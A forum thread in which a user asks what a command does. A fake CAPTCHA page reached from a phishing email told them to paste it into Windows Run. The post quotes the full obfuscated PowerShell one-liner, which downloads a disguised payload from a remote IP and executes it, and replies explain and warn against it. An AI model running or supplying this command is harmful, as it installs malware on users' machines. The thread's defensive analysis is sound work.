
Malware or Virus?

jswany82

Junior Member
I received an email at work that looked exactly like a typical email invitation I get. I clicked the link and it took me to a page that looks just like the login page, but it gave me a robot detector. It said I had to verify I was not a robot and told me to paste this into my CMD-R:

powershell -wind mi -Enc aQBlAHgAKAAoACcAegBpAHoAdwB6AHoAcgAgADkANAAuADEANQA5AC4AMQAxADMALgAzADcALwBzAHoAcwB6AGQALgB6AHAAbgB6AGcAfABpAHoAegBlAHoAeAAnACkALgByAGUAcABsAGEAYwBlACgAJwB6ACcALAAnACcAKQApAA==

Obviously I am not going to do it, but what does this command do?
 
Interesting. That's a base64-encoded command. Decode it and it includes a PowerShell command to "replace('z','')" to de-obfuscate another command. It looks like it downloads a ".png file" from a URL, and then executes it. It's pretty clear that's not a PNG image. It's probably more PowerShell scripts, but I'm not going to that URL to find out.
 
It is exactly that.

The IP address of the fake .png file says it is hosted somewhere in the Russian Federation.

@jswany82 , in the future don't click on unknown links like that. Just report it, delete it, and move on.

The really good hackers will get you when you click the link and won't need you to self-execute the malware like the script kiddies do.

It truly isn't worth finding out what happens when pigs fly.
 
Lol yeah don't enter arbitrary commands into the shell...

We sometimes have to do cybersecurity "training" at work, it's mostly just a 15 minute thing you click through and it shows examples of phishing emails etc. There was one example that actually talked about this new "trick". I had to laugh when I saw it because I can't imagine someone would fall for that. Their example did not use any kind of encoding so you could clearly see it was downloading an executable from a site then running it.

I'm not familiar with PowerShell, but looking at that I assume that string is encoded. It's not base64, as I tried to decode it but it did not do anything.

I asked Grok to see if it can detect the encoding and decode it as I was curious what it would be, but I think I broke Grok. :tearsofjoy:

Edit: ChatGPT was a bit more graceful here.

So what they did is actually quite clever: it is base64, but there's a lot of obfuscation going on. But yeah, it loads a virus on your machine. Don't go to that IP or URL shown!
